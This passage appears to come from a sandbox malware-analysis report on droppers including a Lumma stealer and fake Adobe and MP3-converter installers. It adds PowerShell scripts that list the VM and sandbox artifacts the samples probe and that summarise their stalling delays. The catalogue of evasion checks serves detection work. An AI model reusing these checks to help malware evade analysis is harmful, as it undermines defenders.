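# Assumed vendor substrings a VM check would look for in BIOS/SMBIOS/device strings.
$VmMarkers = @('vmware','vbox','virtualbox','innotek','qemu','bochs','xen','parallels','hyper-v','virtual')

function Find-Marker {
    param([string]$Text)
    if (-not $Text) { return $null }
    $lower = $Text.ToLowerInvariant()
    foreach ($m in $VmMarkers) { if ($lower.Contains($m)) { return $m } }
    return $null
}

function Get-SandboxArtifacts {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. ACPI table vendor keys; the samples open HKLM\HARDWARE\ACPI\DSDT\VBOX__ directly.
    foreach ($table in 'DSDT','FADT','RSDT') {
        $key = "HKLM:\HARDWARE\ACPI\$table"
        if (Test-Path $key) {
            foreach ($sub in Get-ChildItem $key -ErrorAction SilentlyContinue) {
                $hit = Find-Marker $sub.PSChildName
                if ($hit) { $findings.Add("registry: $key\$($sub.PSChildName) (matches '$hit')") }
            }
        }
    }

    # 2. SystemBiosVersion / VideoBiosVersion (REG_MULTI_SZ), queried by Install.exe above.
    $desc = Get-ItemProperty 'HKLM:\HARDWARE\DESCRIPTION\System' -ErrorAction SilentlyContinue
    foreach ($name in 'SystemBiosVersion','VideoBiosVersion') {
        $value = ($desc.$name -join ' ')
        $hit = Find-Marker $value
        if ($hit) { $findings.Add("registry: HARDWARE\DESCRIPTION\System\$name='$value' (matches '$hit')") }
    }

    # 3. Display adapter class key, DriverDesc (same GUID as the query above).
    $disp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000' -ErrorAction SilentlyContinue
    $hit = Find-Marker $disp.DriverDesc
    if ($hit) { $findings.Add("registry: display DriverDesc='$($disp.DriverDesc)' (matches '$hit')") }

    # 4. The three WMI classes RegAsm.exe enumerates.
    foreach ($d in Get-CimInstance Win32_DiskDrive) {
        foreach ($s in $d.Model, $d.PNPDeviceID) {
            $hit = Find-Marker $s
            if ($hit) { $findings.Add("wmi: Win32_DiskDrive '$s' (matches '$hit')"); break }
        }
        # Assumption: a small system disk is a common sandbox heuristic; 80 GB is this example's cut-off.
        if ($d.Size -and $d.Size -lt 80GB) { $findings.Add("wmi: Win32_DiskDrive $($d.DeviceID) is only $([math]::Round($d.Size/1GB)) GB") }
    }
    foreach ($v in Get-CimInstance Win32_VideoController) {
        $hit = Find-Marker "$($v.Name) $($v.Description)"
        if ($hit) { $findings.Add("wmi: Win32_VideoController '$($v.Name)' (matches '$hit')") }
    }
    foreach ($p in Get-CimInstance Win32_Processor) {
        if ($p.NumberOfCores -lt 2) { $findings.Add("wmi: Win32_Processor reports $($p.NumberOfCores) core") }
        $hit = Find-Marker $p.Name
        if ($hit) { $findings.Add("wmi: Win32_Processor '$($p.Name)' (matches '$hit')") }
    }

    # 5. Raw SMBIOS table, one of the tables a FirmwareTableInformation query returns.
    $raw = Get-CimInstance -Namespace root\wmi -ClassName MSSmBios_RawSMBiosTables -ErrorAction SilentlyContinue
    if ($raw) {
        $hit = Find-Marker ([System.Text.Encoding]::ASCII.GetString($raw.SMBiosData))
        if ($hit) { $findings.Add("smbios: raw table contains '$hit'") }
    }

    # 6. Hook DLLs: injected into this process, or simply present in the system directories.
    $loaded = [System.Diagnostics.Process]::GetCurrentProcess().Modules | ForEach-Object { $_.ModuleName.ToLowerInvariant() }
    foreach ($dll in $SandboxDlls) {
        if ($loaded -contains $dll) { $findings.Add("module: $dll loaded in this process") }
        foreach ($dir in "$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64") {
            if (Test-Path (Join-Path $dir $dll)) { $findings.Add("file: $dll present in $dir") }
        }
    }

    # 7. Cursor movement: the GetCursorPos,Sleep,GetCursorPos chain above fails on a static cursor.
    Add-Type -AssemblyName System.Windows.Forms
    $p1 = [System.Windows.Forms.Cursor]::Position
    Start-Sleep -Seconds 3
    $p2 = [System.Windows.Forms.Cursor]::Position
    if ($p1 -eq $p2) { $findings.Add("ui: cursor did not move in 3 s (position $($p1.X),$($p1.Y))") }

    return ,$findings
}

$result = Get-SandboxArtifacts
if ($result.Count -eq 0) { 'no sandbox artifacts found' } else { $result }
```

Run it elevated inside the analysis VM before detonating anything: every line it prints is a string the sample could have read through the same registry, WMI or firmware path, and the cursor check only makes sense while the VM is idle the way it would be during an unattended run.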
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Dropped PE file which has not been started: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Dropped PE file which has not been started: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848 Thread sleep count: 68 > 30
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848 Thread sleep count: 50 > 30
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336 Thread sleep count: 588 > 30
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336 Thread sleep time: -117600s >= -30000s
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7384 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe TID: 7704 Thread sleep count: 220 > 30
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7716 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104 Thread sleep count: 9258 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104 Thread sleep time: -9258000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096 Thread sleep count: 83 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096 Thread sleep time: -83000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 7748 Thread sleep count: 156 > 30
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe TID: 7828 Thread sleep count: 47 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe TID: 7684 Thread sleep time: -58000s >= -30000s
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Last function: Thread delayed (2 identical entries)
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 identical entries)
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 identical entries)
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError, 7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 7_2_0040B300
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Thread delayed: delay time: 300000 (2 identical entries)
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
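A report of this size spreads one process's stalling and VM probes over many rows, so the question that matters for triage (which process stalls for how long, and what does it look at first) is hard to answer by reading. The PowerShell below is an added example, not part of this report: it folds rows of the "Source: <path> <action>" form shown above into one summary per process. The sample rows are copied from this section; the grouping logic and the column names are this example's own. It reads the magnitude of a "Thread sleep time: -Ns" value as milliseconds, which is an inference from the matching "delay time: 300000" rows and from 588 sleep calls summing to 117600, not something the report states; the value 922337203685477 is TimeSpan.MaxValue.TotalMilliseconds, so it is treated as a request for an effectively unbounded delay.

```powershell
# Added example (not from the report): per-process summary of stalling and VM-probe
# rows from a Joe Sandbox behaviour listing. Sample rows are copied from this section.

$ReportLines = @'
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336 Thread sleep count: 588 > 30 Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336 Thread sleep time: -117600s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe File opened: PhysicalDrive0
'@ -split "`r?`n"

# Probe keywords taken from the rows in this section.
$ProbePattern = 'VBOX__|FirmwareTableInformation|SystemBiosVersion|VideoBiosVersion|Win32_DiskDrive|Win32_VideoController|Win32_Processor|PhysicalDrive0|SBIEDLL'
# TimeSpan.MaxValue.TotalMilliseconds: a .NET caller asking for an unbounded delay.
$InfiniteMs = 922337203685477

function Get-EvasionSummary {
    param([string[]]$Lines)
    $byProc = @{}
    foreach ($line in $Lines) {
        # Path may contain spaces ("Soft Jenim MP3 Converter"), so stop at the first ".exe "/".tmp "/".dll ".
        if ($line -notmatch '^Source: (?<path>.+?\.(?:exe|tmp|dll)) (?<rest>.+)$') { continue }
        $proc = Split-Path $Matches.path -Leaf
        $rest = $Matches.rest -replace ' Jump to (?:behavior|dropped file)$', ''   # strip UI link text
        if (-not $byProc.ContainsKey($proc)) {
            $byProc[$proc] = [ordered]@{
                Process = $proc; SleepCalls = 0; SleepEvents = 0; TotalSleepMs = 0L; MaxSleepMs = 0L
                InfiniteSleep = $false; Probes = [System.Collections.Generic.HashSet[string]]::new()
            }
        }
        $e = $byProc[$proc]
        if ($rest -match 'Thread sleep count: (?<n>\d+)') { $e.SleepCalls += [int]$Matches.n }
        if ($rest -match 'Thread sleep time: -?(?<ms>\d+)s') {
            $ms = [int64]$Matches.ms                       # magnitude read as milliseconds (see lead-in)
            $e.SleepEvents++
            $e.TotalSleepMs += $ms
            if ($ms -gt $e.MaxSleepMs) { $e.MaxSleepMs = $ms }
            if ($ms -ge $InfiniteMs) { $e.InfiniteSleep = $true }
        }
        foreach ($m in [regex]::Matches($rest, $ProbePattern, 'IgnoreCase')) { [void]$e.Probes.Add($m.Value) }
    }
    foreach ($e in $byProc.Values) {
        [pscustomobject]@{
            Process = $e.Process; SleepCalls = $e.SleepCalls; SleepEvents = $e.SleepEvents
            TotalSleepMs = $e.TotalSleepMs; MaxSleepMs = $e.MaxSleepMs; InfiniteSleep = $e.InfiniteSleep
            Probes = (($e.Probes | Sort-Object) -join ',')
        }
    }
}

Get-EvasionSummary $ReportLines | Sort-Object TotalSleepMs -Descending | Format-Table -AutoSize
```

On the sample rows this yields one line per process: RegAsm.exe and pRIMqfuwRZ49ldgjUZ_z2py6.exe carry the unbounded delay and RegAsm.exe the WMI hardware probes, while WlCIinu0yp.exe combines 588 short sleeps with the VBOX__ and firmware-table checks. To run it over the full report, replace the here-string with Get-Content of a text export.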
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000123A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH]'
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.000000000601B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWf
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb\<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: vmware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
